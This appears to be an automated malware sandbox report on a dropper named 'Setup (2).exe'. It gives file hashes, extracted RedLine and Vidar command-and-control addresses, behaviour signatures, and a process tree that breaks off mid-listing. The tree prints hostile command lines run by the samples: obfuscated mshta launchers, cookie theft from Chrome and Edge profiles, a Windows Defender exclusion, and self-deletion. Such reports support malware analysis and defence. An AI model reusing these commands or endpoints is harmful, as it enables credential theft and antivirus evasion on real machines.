Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    325s
  • max time network
    1822s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    22-08-2021 09:18

General

  • Target

    Setup (2).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

@big_tastyyy

C2

pewylicha.xyz:80

Extracted

Family

redline

C2

193.56.146.60:51431

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 16 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 59 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 11 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 27 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 27 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 61 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 21 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1120
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2672
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2876
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
          • Modifies registry class
          PID:2680
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2436
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2424
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1916
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1460
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1348
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1236
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:1028
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:60
                        • C:\Users\Admin\AppData\Local\Temp\Setup (2).exe
                          "C:\Users\Admin\AppData\Local\Temp\Setup (2).exe"
                          1⤵
                          • Checks computer location settings
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:660
                          • C:\Users\Admin\Documents\4UHThqYAqUy9oBd1LQ9aDGAS.exe
                            "C:\Users\Admin\Documents\4UHThqYAqUy9oBd1LQ9aDGAS.exe"
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:768
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /im 4UHThqYAqUy9oBd1LQ9aDGAS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\4UHThqYAqUy9oBd1LQ9aDGAS.exe" & del C:\ProgramData\*.dll & exit
                              3⤵
                                PID:5424
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im 4UHThqYAqUy9oBd1LQ9aDGAS.exe /f
                                  4⤵
                                  • Kills process with taskkill
                                  PID:5600
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 6
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:4940
                            • C:\Users\Admin\Documents\4HTyOtE_5OCfXY_j_2obpzz1.exe
                              "C:\Users\Admin\Documents\4HTyOtE_5OCfXY_j_2obpzz1.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3724
                            • C:\Users\Admin\Documents\IN0_YwOUH4Dt88QdNsuAWf3L.exe
                              "C:\Users\Admin\Documents\IN0_YwOUH4Dt88QdNsuAWf3L.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4016
                            • C:\Users\Admin\Documents\IV4mQQpFBDEmP_5qMZWbEJPh.exe
                              "C:\Users\Admin\Documents\IV4mQQpFBDEmP_5qMZWbEJPh.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:872
                              • C:\Users\Admin\Documents\IV4mQQpFBDEmP_5qMZWbEJPh.exe
                                C:\Users\Admin\Documents\IV4mQQpFBDEmP_5qMZWbEJPh.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4208
                            • C:\Users\Admin\Documents\aoxnssvMjvYvJwz_A1vFShRr.exe
                              "C:\Users\Admin\Documents\aoxnssvMjvYvJwz_A1vFShRr.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2188
                            • C:\Users\Admin\Documents\4i2JhbtjGhCoYM9dXFVflYjw.exe
                              "C:\Users\Admin\Documents\4i2JhbtjGhCoYM9dXFVflYjw.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2616
                            • C:\Users\Admin\Documents\dk4UT0qxKO4eO6pXBSOTqlrE.exe
                              "C:\Users\Admin\Documents\dk4UT0qxKO4eO6pXBSOTqlrE.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1792
                            • C:\Users\Admin\Documents\YiTqUYXLcPjkOMA5PhHJD4C5.exe
                              "C:\Users\Admin\Documents\YiTqUYXLcPjkOMA5PhHJD4C5.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1164
                            • C:\Users\Admin\Documents\pg_XEcGtkUBF9EIxe0HOFV39.exe
                              "C:\Users\Admin\Documents\pg_XEcGtkUBF9EIxe0HOFV39.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4012
                              • C:\Users\Admin\AppData\Roaming\5729995.exe
                                "C:\Users\Admin\AppData\Roaming\5729995.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:824
                              • C:\Users\Admin\AppData\Roaming\6070084.exe
                                "C:\Users\Admin\AppData\Roaming\6070084.exe"
                                3⤵
                                  PID:4816
                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4656
                                • C:\Users\Admin\AppData\Roaming\7352631.exe
                                  "C:\Users\Admin\AppData\Roaming\7352631.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4496
                                • C:\Users\Admin\AppData\Roaming\8774956.exe
                                  "C:\Users\Admin\AppData\Roaming\8774956.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2796
                              • C:\Users\Admin\Documents\4T_kYVQ_4oTOyZdfWbEaXjcK.exe
                                "C:\Users\Admin\Documents\4T_kYVQ_4oTOyZdfWbEaXjcK.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:1948
                                • C:\Users\Admin\Documents\4T_kYVQ_4oTOyZdfWbEaXjcK.exe
                                  "C:\Users\Admin\Documents\4T_kYVQ_4oTOyZdfWbEaXjcK.exe" -q
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4644
                              • C:\Users\Admin\Documents\q2hTBYp8Vt36tYFPN5f5hwFC.exe
                                "C:\Users\Admin\Documents\q2hTBYp8Vt36tYFPN5f5hwFC.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2356
                                • C:\Users\Admin\Documents\q2hTBYp8Vt36tYFPN5f5hwFC.exe
                                  "C:\Users\Admin\Documents\q2hTBYp8Vt36tYFPN5f5hwFC.exe"
                                  3⤵
                                    PID:788
                                • C:\Users\Admin\Documents\J3SY5VQjkZpzX_fLfB6IP40l.exe
                                  "C:\Users\Admin\Documents\J3SY5VQjkZpzX_fLfB6IP40l.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:1232
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 704
                                    3⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4136
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 744
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1728
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 776
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3768
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 660
                                    3⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4620
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 1160
                                    3⤵
                                    • Program crash
                                    PID:4928
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 1116
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4988
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 1160
                                    3⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4492
                                • C:\Users\Admin\Documents\hnPRKMDzyF_lYxWsWc2YZGpY.exe
                                  "C:\Users\Admin\Documents\hnPRKMDzyF_lYxWsWc2YZGpY.exe"
                                  2⤵
                                    PID:4080
                                  • C:\Users\Admin\Documents\vi7soopammuenJZt4gVQclHi.exe
                                    "C:\Users\Admin\Documents\vi7soopammuenJZt4gVQclHi.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:1060
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 684
                                      3⤵
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4300
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 680
                                      3⤵
                                      • Program crash
                                      PID:4948
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 776
                                      3⤵
                                      • Program crash
                                      PID:4608
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 660
                                      3⤵
                                      • Program crash
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4632
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1172
                                      3⤵
                                      • Program crash
                                      PID:5032
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1120
                                      3⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:200
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1148
                                      3⤵
                                      • Program crash
                                      PID:4228
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1104
                                      3⤵
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4672
                                  • C:\Users\Admin\Documents\aSj4VfpRiqMxeAct0mfbSAWl.exe
                                    "C:\Users\Admin\Documents\aSj4VfpRiqMxeAct0mfbSAWl.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4028
                                  • C:\Users\Admin\Documents\EDKbTUR02eMrKvhNSFul0VbK.exe
                                    "C:\Users\Admin\Documents\EDKbTUR02eMrKvhNSFul0VbK.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:4080
                                    • C:\Windows\SysWOW64\mshta.exe
                                      "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\EDKbTUR02eMrKvhNSFul0VbK.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\EDKbTUR02eMrKvhNSFul0VbK.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                      3⤵
                                        PID:4844
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\EDKbTUR02eMrKvhNSFul0VbK.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\EDKbTUR02eMrKvhNSFul0VbK.exe" ) do taskkill -f -iM "%~NxA"
                                          4⤵
                                            PID:4684
                                            • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                              hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4948
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                6⤵
                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                PID:4228
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                  7⤵
                                                    PID:5564
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                  6⤵
                                                  • Loads dropped DLL
                                                  PID:3256
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill -f -iM "EDKbTUR02eMrKvhNSFul0VbK.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4204
                                        • C:\Users\Admin\Documents\5kGnRMbiFHXFfUHgS4Lz2miW.exe
                                          "C:\Users\Admin\Documents\5kGnRMbiFHXFfUHgS4Lz2miW.exe"
                                          2⤵
                                            PID:200
                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:4972
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:4252
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5744
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:3548
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:196
                                              • C:\Windows\system32\WerFault.exe
                                                C:\Windows\system32\WerFault.exe -u -p 4972 -s 1516
                                                4⤵
                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                • Program crash
                                                PID:5572
                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Checks whether UAC is enabled
                                              • Drops file in Program Files directory
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4932
                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:4896
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                  PID:4204
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:5216
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                    PID:8740
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    4⤵
                                                      PID:7460
                                                • C:\Users\Admin\Documents\vYWxjnZn_RYq33I0Zp9qmTbc.exe
                                                  "C:\Users\Admin\Documents\vYWxjnZn_RYq33I0Zp9qmTbc.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:4376
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\VYWXJN~1.DLL,s C:\Users\Admin\DOCUME~1\VYWXJN~1.EXE
                                                    3⤵
                                                    • Blocklisted process makes network request
                                                    • Loads dropped DLL
                                                    • Drops file in Program Files directory
                                                    PID:5920
                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\VYWXJN~1.DLL,jDpSNGZpeg==
                                                      4⤵
                                                      • Blocklisted process makes network request
                                                      • Loads dropped DLL
                                                      • Checks processor information in registry
                                                      • Modifies system certificate store
                                                      PID:8236
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\VYWXJN~1.DLL
                                                        5⤵
                                                          PID:8836
                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\VYWXJN~1.DLL,hDtIWld4OXZE
                                                          5⤵
                                                          • Loads dropped DLL
                                                          • Suspicious use of SetThreadContext
                                                          • Checks processor information in registry
                                                          PID:6028
                                                          • C:\Windows\system32\rundll32.exe
                                                            C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
                                                            6⤵
                                                              PID:7852
                                                              • C:\Windows\system32\ctfmon.exe
                                                                ctfmon.exe
                                                                7⤵
                                                                  PID:7212
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpB2F7.tmp.ps1"
                                                              5⤵
                                                                PID:2120
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp4F27.tmp.ps1"
                                                                5⤵
                                                                  PID:1744
                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                    "C:\Windows\system32\nslookup.exe" -type=any localhost
                                                                    6⤵
                                                                      PID:1868
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                                    5⤵
                                                                      PID:5192
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                                      5⤵
                                                                        PID:6716
                                                                • C:\Users\Admin\Documents\wLZDNCYKtN6iWG1VtzTslbnb.exe
                                                                  "C:\Users\Admin\Documents\wLZDNCYKtN6iWG1VtzTslbnb.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:4712
                                                              • \??\c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                1⤵
                                                                • Suspicious use of SetThreadContext
                                                                • Modifies registry class
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3584
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                  2⤵
                                                                  • Drops file in System32 directory
                                                                  • Checks processor information in registry
                                                                  • Modifies data under HKEY_USERS
                                                                  • Modifies registry class
                                                                  PID:5772
                                                              • C:\Users\Admin\AppData\Local\Temp\is-U8T70.tmp\wLZDNCYKtN6iWG1VtzTslbnb.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-U8T70.tmp\wLZDNCYKtN6iWG1VtzTslbnb.tmp" /SL5="$20200,138429,56832,C:\Users\Admin\Documents\wLZDNCYKtN6iWG1VtzTslbnb.exe"
                                                                1⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:4856
                                                                • C:\Users\Admin\AppData\Local\Temp\is-HUASF.tmp\Setup.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-HUASF.tmp\Setup.exe" /Verysilent
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:4908
                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:5620
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 760
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:6392
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 784
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:6452
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 772
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:5984
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 824
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:1340
                                                                    • C:\Windows\SysWOW64\WerFault.exe
